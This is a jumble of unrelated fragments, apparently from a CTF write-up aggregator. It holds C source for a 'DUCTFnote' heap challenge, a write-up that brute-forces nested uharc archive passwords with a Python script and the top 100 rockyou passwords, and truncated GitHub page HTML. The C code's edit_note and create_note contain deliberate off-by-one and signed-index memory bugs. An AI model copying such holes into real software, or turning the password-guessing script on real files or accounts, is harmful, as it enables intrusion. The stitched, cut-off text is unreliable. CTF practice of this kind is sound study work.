void welcome() { printf(" %%%%%%%%%%%%%%%%%% \n"); printf(" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \n"); printf(" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%..............%%%%%%%% \n"); printf(" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ,%% \n"); printf(" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ,%% \n"); printf(" %%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%% ,%% \n"); printf(" %%%%%%%%%%%%%%%% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ,%% \n"); printf(" %%%%%%%%%%%%%%%% %%%%%%%%%%\\ %%%%%%%%%%%%%%%%%%%% %%%%##%% \n"); printf(" %%%%%%%%%%%%%%%% %%%%%%%%%%%%\\ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%% ,%% \n"); printf(" %%%%%%%%%%%%%%%% %%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%% %%%% ,%% \n"); printf(" %%%%%%%%%%%%%%%% %%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%% %%%%%%%%%% \n"); printf(" %%%%%%%%%%%%%%%% %%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%% ,%% \n"); printf(" %%%%%%%%%%%%%%%% %%%%%%%%%%%%/ %%%%%%%%%%%%%%%%%%%% %%%% ,%% \n"); printf(" %%%%%%%%%%%%%%%% %%%%%%%%/ %%%%%%%%%%%%%%%%%%%%%%..........\n"); printf(" %%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%% %%%% ,%% \n"); printf(" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%% ,%% \n"); printf(" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \n"); printf(" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% \n"); printf(" %%%%%%%%%%%%%%\n\n");
printf(" *******************************************\n"); printf(" * DUCTFnote * \n"); printf(" *******************************************\n\n");}
void print_menu() { printf("\n"); printf("1. Create Note\n"); printf("2. Show Note\n"); printf("3. Edit Note\n"); printf("4. Delete Note\n"); printf(">> ");}
datanote_t * create_note(unsigned int size, param_t *params) { if (size > params->maxsize) { printf("Note too big.\n"); return 0; } int allocsize = size | 0x80; datanote_t * note = (datanote_t*)malloc(allocsize + 8); note->size = size; return note;}
void show_note(datanote_t * note) { if(!note) { printf("No Note.\n"); return; }
printf("<------------ NOTE 1 ------------>\n"); fwrite(&(note->data), note->size, 1, stdout); printf("\n"); printf("<-------------------------------->\n"); printf("\n");}
void edit_note(datanote_t * note) { if(!note) { printf("No Note.\n"); return; }
signed char idx = 0; while(idx <= note->size) { *(&(note->data)+idx) = fgetc(stdin); if (*(&(note->data)+idx) == '\n') {*(&(note->data)+idx) = '\0'; break;} idx++; }}``` |
The idea is simple..
1. extract Uhaha's challenge file using your favorite Uha Extractor (in this case we're using uharc) with bruteforce technique using first 100 rockyou wordlists2. extract the content of Uhaha extracted from previouse step using "Step 1"3. repeat until you extracted the flag
write simple python script ftw
```import osimport subprocess
wl = ['123456', '12345', '123456789', 'password', 'iloveyou', 'princess', '1234567', 'rockyou', '12345678', 'abc123', 'nicole', 'daniel', 'babygirl', 'monkey', 'lovely', 'jessica', '654321', 'michael', 'ashley', 'qwerty', '111111', 'iloveu', '000000', 'michelle', 'tigger', 'sunshine', 'chocolate', 'password1', 'soccer', 'anthony', 'friends', 'butterfly', 'purple', 'angel', 'jordan', 'liverpool', 'justin', 'loveme', 'fuckyou', '123123', 'football', 'secret', 'andrea', 'carlos', 'jennifer', 'joshua', 'bubbles', '1234567890', 'superman', 'hannah', 'amanda', 'loveyou', 'pretty', 'basketball', 'andrew', 'angels', 'tweety', 'flower', 'playboy', 'hello', 'elizabeth', 'hottie', 'tinkerbell', 'charlie', 'samantha', 'barbie', 'chelsea', 'lovers', 'teamo', 'jasmine', 'brandon', '666666', 'shadow', 'melissa', 'eminem', 'matthew', 'robert', 'danielle', 'forever', 'family', 'jonathan', '987654321', 'computer', 'whatever', 'dragon', 'vanessa', 'cookie', 'naruto', 'summer', 'sweety', 'spongebo', 'joseph', 'junior', 'softball', 'taylor', 'yellow', 'daniela', 'lauren', 'mickey', 'princesa']
def test(passwd, f): out = subprocess.run(['uharc', 'e', f'-pw{passwd}', f], stdout=subprocess.PIPE) return out.stdout
c = 0while True: for i in wl: print(f'[Trying] : {i}') cname = f'uhaha-{c}.uha' res = test(i, cname) if b'ERROR' not in res: print(f'[Found] : {i}') c += 1 os.rename('uhaha', f'uhaha-{c}.uha') print(res) break```
got the flag after repeating 50 times
 |
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" integrity="sha512-L06pZD/4Yecj8D8pY5aYfA7oKG6CI8/hlx2K9ZlXOS/j5TnYEjrusaVa9ZIb9O3/tBHmnRFLzaC1ixcafWtaAg==" rel="stylesheet" href="https://github.githubassets.com/assets/light-2f4ea9643ff861e723f03f296396987c.css" /><link crossorigin="anonymous" media="all" integrity="sha512-xcx3R1NmKjgOAE2DsCHYbus068pwqr4i3Xaa1osduISrxqYFi3zIaBLqjzt5FM9VSHqFN7mneFXK73Z9a2QRJg==" rel="stylesheet" href="https://github.githubassets.com/assets/dark-c5cc774753662a380e004d83b021d86e.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" integrity="sha512-xlDV9el7Cjd+KTSbwspx+c8its28uxn++hLZ9pqYYo1zOVcpLPlElTo42iA/8gV3xYfLvgqRZ3dQPxHCu4UaOQ==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-c650d5f5e97b0a377e29349bc2ca71f9.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" integrity="sha512-jkzjbgytRSAyC4EMcrdpez+aJ2CROSpfemvgO2TImxO6XgWWHNG2qSr2htlD1SL78zfuPXb+iXaVTS5jocG0DA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-8e4ce36e0cad4520320b810c72b7697b.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" integrity="sha512-FzS8HhJ7XSHmx/dBll4FYlvu+8eivvb7jnttZy9KM5plsMkgbEghYKJszrFFauqQvv7ezYdbk7v/d8UtdjG9rw==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-1734bc1e127b5d21e6c7f741965e0562.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" integrity="sha512-IpkvxndMpMcO4paMJl83lYTcy18jv2jqG7mHZnTfr9HRV09iMhuQ/HrE+4mQO2nshL7ZLejO1OiVNDQkyVFOCA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-22992fc6774ca4c70ee2968c265f3795.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-4hzfg/znP4UxIOUt/r3SNYEZ6jBPJIS6PH4VC26tE0Nd4xAymMC3KXDaC9YITfG4fhyfxuB1YnDHo1H2iUwsfg==" rel="stylesheet" href="https://github.githubassets.com/assets/frameworks-e21cdf83fce73f853120e52dfebdd235.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-sT0AyFLl78shyaRWRXOw8uwRSnR+7tURIXoJwVYadATkrqeWfze5y/tOu8MS1mbzUKl6pgLjfEdT+U8bwBJHfQ==" rel="stylesheet" href="https://github.githubassets.com/assets/behaviors-b13d00c852e5efcb21c9a4564573b0f2.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-jdtbQr5ZSKZqID/c80i87Ml+YyEhYVd5sF9szeR+Xuvbfhi4yLJbEsSllzk0XRzcbWqD4tDtshhRo5IuJx4Mzw==" rel="stylesheet" href="https://github.githubassets.com/assets/github-8ddb5b42be5948a66a203fdcf348bcec.css" />
<script crossorigin="anonymous" defer="defer" integrity="sha512-/0zs/So9AxtDONKx324yW8s62PoPMx4Epxmk1aJmMgIYIKUkQg4YqlZQ06B4j0tSXQcUB8/zWiIkhLtVEozU/w==" type="application/javascript" src="https://github.githubassets.com/assets/environment-ff4cecfd.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-8p4kkx6e3xBq1g3NP0O3/AW/aiTQ+VRxYencIeMD8crx7AEwrOTV+XOL/UE8cw4vEvkoU/zzLEZ9cud0jFfI4w==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-frameworks-f29e2493.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-slE3Aa2Duzwgju0UbTfes+w5slmaEOhXwom+Ev+pPsxxOpeh2CGZqfriJGr6pkhTZX+ffOTTYl3GnSLtp7AkJw==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-vendor-b2513701.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ZDU7IsI6lFo4eeBuqkrh/Htsa12ZYOi44uBhKqG0LyV6XHM502iJjjsIVnmtmNXrrC9oGMf2O5i57Bx4lwGsXw==" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-64353b22.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ODZJzCJpaOfusrIka5QVZQcPiO9LBGyrrMYjhhJWSLuCN5WbZ5xiEiiOPOKVu71dqygyRdB2TY7AKPA1J5hqdg==" type="application/javascript" data-module-id="./chunk-unveil.js" data-src="https://github.githubassets.com/assets/chunk-unveil-383649cc.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-emPgUbSwW9ezLCgRnTE7n4fbbfc/MqEEDHmnkmG61dTyjWKHTYKN4wN3OPS7SY0fwmSJ8mB5+gng2nZw4/HsUg==" type="application/javascript" data-module-id="./chunk-animate-on-scroll.js" data-src="https://github.githubassets.com/assets/chunk-animate-on-scroll-7a63e051.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-pWX6rMbTl/ERAhhtbAyXiJzoXFr91jp/mRy2Xk4OpAId3aVFI2X+yI8X3mhbf985F5BRHamuRx20kG62nRtSLQ==" type="application/javascript" data-module-id="./chunk-ref-selector.js" data-src="https://github.githubassets.com/assets/chunk-ref-selector-a565faac.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GKiNgfnSOtC7SUFIvLZMYoteE7iKDONxzaeovKiziJczuW1P4KMU1KhXeoTv4WEN0ufeXC9ejA8HvgYa+xPAAQ==" type="application/javascript" data-module-id="./chunk-filter-input.js" data-src="https://github.githubassets.com/assets/chunk-filter-input-18a88d81.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HRWFwpj3BLrXflQCvPbnuXPFjpnti5TtcqJqUx/b6klMyuskNlUBIo+1UT0KVHFdEW/Y9QKjmXlZxhP6z1j5pg==" type="application/javascript" data-module-id="./chunk-edit.js" data-src="https://github.githubassets.com/assets/chunk-edit-1d1585c2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GhqHDMwaAgqUsjVyltYVhaaLYy2G887rPRXXNbsdaI+Xm3dh0fbaHLhZns70EjFAEpXBgCAYFYdnlG1IQFmz1A==" type="application/javascript" data-module-id="./chunk-responsive-underlinenav.js" data-src="https://github.githubassets.com/assets/chunk-responsive-underlinenav-1a1a870c.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-gmw7obKL/JEHWPp6zWFh+ynbXUFOidj1DN2aPiTDwP8Gair0moVuDmA340LD84A29I3ZPak19CEiumG+oIiseg==" type="application/javascript" data-module-id="./chunk-tag-input.js" data-src="https://github.githubassets.com/assets/chunk-tag-input-826c3ba1.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Ao9llFIlj54ApuKf2QLboXukbu2h7MHfMmtYHrrsVe1lprKNLiA0usVcRpvruKhfT5STDuWm/GGmyx8ox27hWQ==" type="application/javascript" data-module-id="./chunk-notification-list-focus.js" data-src="https://github.githubassets.com/assets/chunk-notification-list-focus-028f6594.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SPWd3rzrxmU6xW6vy1JPWCd+3uWFWmnd0MVGpmw/TpHWUAdLWDqL8kWyC/sBIZJmda4mTtUO1DHJQzAXRSrC+g==" type="application/javascript" data-module-id="./chunk-cookies.js" data-src="https://github.githubassets.com/assets/chunk-cookies-48f59dde.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-MK53GXbb2BPV+ADlEbJbkrvg34WPcAd5RC2nBJhUH1tR/Mjr9xrsf56ptBajfWcIWKRKbqqRtLktgr0wAbB3zw==" type="application/javascript" data-module-id="./chunk-async-export.js" data-src="https://github.githubassets.com/assets/chunk-async-export-30ae7719.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-tw9SApiMkftVBYeb6/VGhEwGNw8tlyBhXc9RVXH4UbCD6u+48uuCMvXf3bxvBdOld0OoYg83SnD2mgJWhdaTiQ==" type="application/javascript" data-module-id="./chunk-premium-runners.js" data-src="https://github.githubassets.com/assets/chunk-premium-runners-b70f5202.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-D576CjzS9sbDqFBJdq0Y6+KVMHXkO6mLFO/GRL1NtoE8jgXjAvmdjoZ4nNMWyDwqbtBHspvupORzE9L+YoBLYQ==" type="application/javascript" data-module-id="./chunk-get-repo-element.js" data-src="https://github.githubassets.com/assets/chunk-get-repo-element-0f9efa0a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xhSAO0KtnFAlRqAK+mg8BPj/J334ccvnCmmjmBQBCgZcsoO9teHJSS6oAn3XOWYFsWPU2JehwG7S3OVEbLwdUg==" type="application/javascript" data-module-id="./chunk-color-modes.js" data-src="https://github.githubassets.com/assets/chunk-color-modes-c614803b.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-jitxouuFY6SUcDZV5W3jhadVEIfFBfCQZxfPV3kxNnsWEBzbxMJFp0ccLb7+OlBjSs1zU/MNtuOV6T9Ay7lx4w==" type="application/javascript" data-module-id="./chunk-copy.js" data-src="https://github.githubassets.com/assets/chunk-copy-8e2b71a2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Auj2atZZccqguPinFmOL2k1TCzZs/yfMMFF5aMYMB/5miqEN7v4oAFG0o3Np24NOTkJ9o/txZCeuT6NGHgGoUA==" type="application/javascript" data-module-id="./chunk-voting.js" data-src="https://github.githubassets.com/assets/chunk-voting-02e8f66a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HDsLJf6gAN+WDFaJneJwmIY82XkZKWqeX7tStBLRh1XM53K8vMV6JZvjq/UQXszaNVWxWcuYtgYTG6ZWo8+QSw==" type="application/javascript" data-module-id="./chunk-confetti.js" data-src="https://github.githubassets.com/assets/chunk-confetti-1c3b0b25.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-zEirtMGIgj3NVAnB8kWhDykK5NLa7q4ugkIxB7EftbovRjhU3X5I/20Rploa4KGPwAR27e36rAljHIsDKbTm/Q==" type="application/javascript" data-module-id="./chunk-codemirror.js" data-src="https://github.githubassets.com/assets/chunk-codemirror-cc48abb4.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Gr3ZcJt5t73JeBM3NwOEziKyDZ3HpHwzqZL/c1pgTUfo+6QC5f88XXRw/RT6X2diwqvaa3OVFh0oWsZ9ZxhtdQ==" type="application/javascript" data-module-id="./chunk-tip.js" data-src="https://github.githubassets.com/assets/chunk-tip-1abdd970.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-EdQvlnI4Pu5Q6K0HCvp+mi0Vw9ZuwaEuhbnCbmFKX+c0xwiUWY0L3n9P0F6doLhaHhfpvW3718+miL11WG4BeA==" type="application/javascript" data-module-id="./chunk-line.js" data-src="https://github.githubassets.com/assets/chunk-line-11d42f96.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4zSHP2sQXPKoN9jFy8q2ThHsQNej8s4qhubSR4g0/2dTexAEnoTG+RbaffdIhmjfghGjpS/DlE0cdSTFEOcipQ==" type="application/javascript" data-module-id="./chunk-array.js" data-src="https://github.githubassets.com/assets/chunk-array-e334873f.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-g8fb6U7h9SkWgiK69nfNMn4aN5D2YBYPZUbCIuLpemWoOw8NOaZY8Z0hPq4RUVs4+bYdCFR6K719k8lwFeUijg==" type="application/javascript" data-module-id="./chunk-band.js" data-src="https://github.githubassets.com/assets/chunk-band-83c7dbe9.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6oWCu7ltWLHlroIRg8mR6RloC1wqKS9aK9e5THWgzaE2GNPAdoC+MLZEYD/TdIiZxsQRev0RInyonsXGBK0aMw==" type="application/javascript" data-module-id="./chunk-toast.js" data-src="https://github.githubassets.com/assets/chunk-toast-ea8582bb.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-miaiZ1xkDsWBUsURHOmeYtbgVKQGnm1octCo/lDXUmPzDyjtubnHULRVw1AK+sttwdwyB0+LOyhIVAWCNSGx+A==" type="application/javascript" data-module-id="./chunk-delayed-loading-element.js" data-src="https://github.githubassets.com/assets/chunk-delayed-loading-element-9a26a267.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GD25CNhMGDMzEmeFhUT0FILBupAkx5/CHohnYXOP1togy40O0iu/lASaSp3gV8ue0nwscalJVQqR5gKDRHHDVg==" type="application/javascript" data-module-id="./chunk-three.module.js" data-src="https://github.githubassets.com/assets/chunk-three.module-183db908.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4vVRplWFI7P4m3RHQ0QAhkq6eZUdtIE8PBhsKYJRwDkhQw9iK/U1st1/fM1tQZFuBFwGMyqaZblbWtQ+2ejcqQ==" type="application/javascript" data-module-id="./chunk-slug.js" data-src="https://github.githubassets.com/assets/chunk-slug-e2f551a6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Ofk7ddnMsJ6F9d2vCuPQav+FG9Rg8i6WRG2KmbzwT01S9H4y58Fl42zYxDh/lJjOWeSyOB9KJyfIkdpCCTYG9A==" type="application/javascript" data-module-id="./chunk-invitations.js" data-src="https://github.githubassets.com/assets/chunk-invitations-39f93b75.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-vFR+IqThljOLrAWmjhOL/kiQrjgZZg95uPovX0J7kRH5p7Y049LDRZaXLMDijfeqqk71d3MMn9XP5bUcH+lB9w==" type="application/javascript" data-module-id="./chunk-profile.js" data-src="https://github.githubassets.com/assets/chunk-profile-bc547e22.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-FeRujRzXPfs03roBR3mnHvWukfFpu27XbyZPQri9jcCY0AdUWSM5R4drHTJUDQ62Pz/aX0rSS5xORvTu7NsjlQ==" type="application/javascript" data-module-id="./chunk-overview.js" data-src="https://github.githubassets.com/assets/chunk-overview-15e46e8d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xqw233932eUGcGURAPuwUWZpC5Km/9Btq7/2Jnkt1rSWnPSVfMl+JKpr9eLtCoQmrpgP8vaghEuX8bWAS8fzTg==" type="application/javascript" data-module-id="./chunk-advanced.js" data-src="https://github.githubassets.com/assets/chunk-advanced-c6ac36df.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6Rmd0BBAsJ9ouvb/pgrkToMPs5ogcqi8rcQ7R3GDPPHIjlu0NZ0Bx6HUn/aOruMCECETHm4Exfs5gjYdHs66RQ==" type="application/javascript" data-module-id="./chunk-runner-groups.js" data-src="https://github.githubassets.com/assets/chunk-runner-groups-e9199dd0.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xdGx4qSd2qa0c/AVc4wDqpBhFHasDjOZ5y+MbwuIRA+ar7YxAFhZ2pGFs/+W5hVjSv+BMfKrcWpgLwR3xPIWHA==" type="application/javascript" data-module-id="./chunk-profile-pins-element.js" data-src="https://github.githubassets.com/assets/chunk-profile-pins-element-c5d1b1e2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-LrD2kFGlUY4JxKVeN3dgYfuhfq0akTPGHtqW0gxkM2sDqVY6pauK2k57tmMHw4TQdcUrs+RQnBc1HPD+ou+ZfQ==" type="application/javascript" data-module-id="./chunk-emoji-picker-element.js" data-src="https://github.githubassets.com/assets/chunk-emoji-picker-element-2eb0f690.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-EvJ2Fip59DXgARNuwTWgjdVqoCjhXQL73SP9yexijlWStKq92sfbKeGK5R4wIP0QOr39WsnW/Kaw3Wpl1QPfog==" type="application/javascript" data-module-id="./chunk-edit-hook-secret-element.js" data-src="https://github.githubassets.com/assets/chunk-edit-hook-secret-element-12f27616.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-W0EihGBOA1mE3orR7s2squ9xVaLXrwd2bOYY9SSslfZHrovrS6KenJU+XXn+CaykddON6/aFEd/FbuQ/FltI9Q==" type="application/javascript" data-module-id="./chunk-insights-query.js" data-src="https://github.githubassets.com/assets/chunk-insights-query-5b412284.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-D/5Ad6jlKQNRPSHbVN5ShlFXOTyRsKbT7O0cWbVHwtOZ/UrwOC5bHKaQFHTq46qeMBbFKyDG+oIdtm5G8NifDA==" type="application/javascript" data-module-id="./chunk-remote-clipboard-copy.js" data-src="https://github.githubassets.com/assets/chunk-remote-clipboard-copy-0ffe4077.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SUjF5sI77QngAIQUwKJRgZuIM4qggFBMtOZJ3EFS7ecv4uq4BQQJivDVxNBG9api9/rWrpw0d6RzvTCz2GrbdA==" type="application/javascript" data-module-id="./chunk-series-table.js" data-src="https://github.githubassets.com/assets/chunk-series-table-4948c5e6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-nrfktuuo7BZhPpJxM4fVi62vPbZu6VJZ7ykfarxBExTTDnchXEalCJOq2O3GrVdfWu9cdn9kR/J8+oeTAjdHlA==" type="application/javascript" data-module-id="./chunk-line-chart.js" data-src="https://github.githubassets.com/assets/chunk-line-chart-9eb7e4b6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-IOMGagwchKC7UeWHK/bV/rO1F1/RZAH0fNNouWV2boLOtE1a9LUbesoRsYK7sz6aFXslPC8fLfow+yWpT1eZzQ==" type="application/javascript" data-module-id="./chunk-stacked-area-chart.js" data-src="https://github.githubassets.com/assets/chunk-stacked-area-chart-20e3066a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GohDpVrxfHqlavb8Zabvj+y/s6CHegYwyGpQxKtzR2MkQsynBC98LdLongRFMHI+TKAECLavp200Lsy9JbV5TQ==" type="application/javascript" data-module-id="./chunk-presence-avatars.js" data-src="https://github.githubassets.com/assets/chunk-presence-avatars-1a8843a5.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-TpHTIXhA/2bI21CVmFL1oS3dv+8zveJVZLOVVAZwXNAAI94Hy70L9vT3Q1Vvkyu4Z2gi2iFdy1a53pfYlEDgnQ==" type="application/javascript" data-module-id="./chunk-pulse-authors-graph-element.js" data-src="https://github.githubassets.com/assets/chunk-pulse-authors-graph-element-4e91d321.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-aNAcFMlIdG1ocY5LnZylnN/6KXiJxyPvKg7y1Jnai732wdnrjXazcvNiQkRnj5FY8WP6JRa3K4doCReA4nhj7w==" type="application/javascript" data-module-id="./chunk-stacks-input-config-view.js" data-src="https://github.githubassets.com/assets/chunk-stacks-input-config-view-68d01c14.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-MXXdKvrDUhz9jfXB1/McrPebK8VbV5haYcxcNt5WXgbUym55dZattmCIAK2pJFAD2h4aBUFHo7CzpjmDYf7EkQ==" type="application/javascript" data-module-id="./chunk-community-contributions.js" data-src="https://github.githubassets.com/assets/chunk-community-contributions-3175dd2a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-eWDdPSTt/NMNFFSNdUSOf36O6AJJepQdiKFtVzHjM5WYpUTAg21zPoyeA4DqfPNL5RggK/+RjWQZzypmNBAH4w==" type="application/javascript" data-module-id="./chunk-discussion-page-views.js" data-src="https://github.githubassets.com/assets/chunk-discussion-page-views-7960dd3d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-5+v3VN/rhJv/1iAOVphuCGs1FM9eUlSB43CJLw1txGMLvuPNNz/xHQbzTOIW+t2NKFpTnptRvKbuicQ3Jp28UQ==" type="application/javascript" data-module-id="./chunk-discussions-daily-contributors.js" data-src="https://github.githubassets.com/assets/chunk-discussions-daily-contributors-e7ebf754.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-/PSS3erY5t+SZL9B5T6Edgzy2pLD3jx7G/ZqQE+UCPhaaMEEc8Qrhv5XTREOOX0e3DquvxVDDM/KVa6SK/BPcA==" type="application/javascript" data-module-id="./chunk-discussions-new-contributors.js" data-src="https://github.githubassets.com/assets/chunk-discussions-new-contributors-fcf492dd.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-7vazCSTbHAmhDkKepqPuoJu5ZlBV51uKBKdUTiKd5UylsfULxuXr6XtFSZ16eU4TzdMAifa2hR4riO/QRi/9gw==" type="application/javascript" data-module-id="./chunk-tweetsodium.js" data-src="https://github.githubassets.com/assets/chunk-tweetsodium-eef6b309.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-AVKfqEKBF/JCvS2PoakItu304k6gGt9oSMBW2R/eEfGsGuTmC9QeiQw//IJJKFRQdrzpha/FoC/cws9v6dsujQ==" type="application/javascript" data-module-id="./chunk-jump-to.js" data-src="https://github.githubassets.com/assets/chunk-jump-to-01529fa8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-mQXS2AvjT52IlcDNeeAaWUnOLa3aaGISiApB7zeboZBSILzsVM1ikEJdM7VIaH+xwYYT/D6lqtIwjO1/KVbK2Q==" type="application/javascript" data-module-id="./chunk-user-status-submit.js" data-src="https://github.githubassets.com/assets/chunk-user-status-submit-9905d2d8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4xtjUJAtGhsZOLk+SHoir8MWF0vKHoR4tGlR36xsg1kGrE9ftN4BHe21k2TT5jSkqz5x8z7BfZKj/eUuwcZMEQ==" type="application/javascript" data-module-id="./chunk-launch-code-element.js" data-src="https://github.githubassets.com/assets/chunk-launch-code-element-e31b6350.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-NilVxyBbQNJ61v85EVcC3VjOsz5tz+bOlaR1h1R+jIFXNT8VhoalRgPXREht+R3JIZF5fiqkkHZy3+01pX4ZDg==" type="application/javascript" data-module-id="./chunk-metric-selection-element.js" data-src="https://github.githubassets.com/assets/chunk-metric-selection-element-362955c7.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-VtwQp1HbSSWXOsB5a8wzpRH8Bl7/vD0jgBgXsp2K2CTYkhfq/LAWps52SnVQjcRPoB2svCVaJV20hyFuCbGL3w==" type="application/javascript" data-module-id="./chunk-severity-calculator-element.js" data-src="https://github.githubassets.com/assets/chunk-severity-calculator-element-56dc10a7.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-yXHkwiNZgB6O0iSDKE8jrZzTtTyF8YdFFXHcemhWEPuN3sWs1PQrSwEh0Gw4/B9TIzUfvogbqlJ71yLLuqyM+Q==" type="application/javascript" data-module-id="./chunk-readme-toc-element.js" data-src="https://github.githubassets.com/assets/chunk-readme-toc-element-c971e4c2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-QMvMhJF7+RJNuy+lp8zP+XbKf08Cc36NVOw6CMk0WRGAO1kmoNhTC+FjHB5EBFx/sDurFeYqerS3NGhusJncMA==" type="application/javascript" data-module-id="./chunk-feature-callout-element.js" data-src="https://github.githubassets.com/assets/chunk-feature-callout-element-40cbcc84.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SyYXfc8EbLO9BnTas69LeNMF6aXITT41QqsFoIuEHHt/0i9+WQAV7ZFBu944TFS7HHFu9eRgmdq1MU/W12Q8xw==" type="application/javascript" data-module-id="./chunk-sortable-behavior.js" data-src="https://github.githubassets.com/assets/chunk-sortable-behavior-4b26177d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6JUQHgkTqBaCCdDugMcO4fQ8YxUHk+m6rwVp2Wxa4FMVz6BbBMPOzGluT4wBq8NTUcFv6DnXSOnt5e85jNgpGg==" type="application/javascript" data-module-id="./chunk-drag-drop.js" data-src="https://github.githubassets.com/assets/chunk-drag-drop-e895101e.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-28pipPJZvizfcYYETJWBBeDHsrDEz7A06d7Y5swgY/OWmsX0ZJW6mkZVFRO7Z/xZh1D1qFbPHGNixfCd1YpBnA==" type="application/javascript" data-module-id="./chunk-contributions-spider-graph.js" data-src="https://github.githubassets.com/assets/chunk-contributions-spider-graph-dbca62a4.js"></script> <script crossorigin="anonymous" defer="defer" 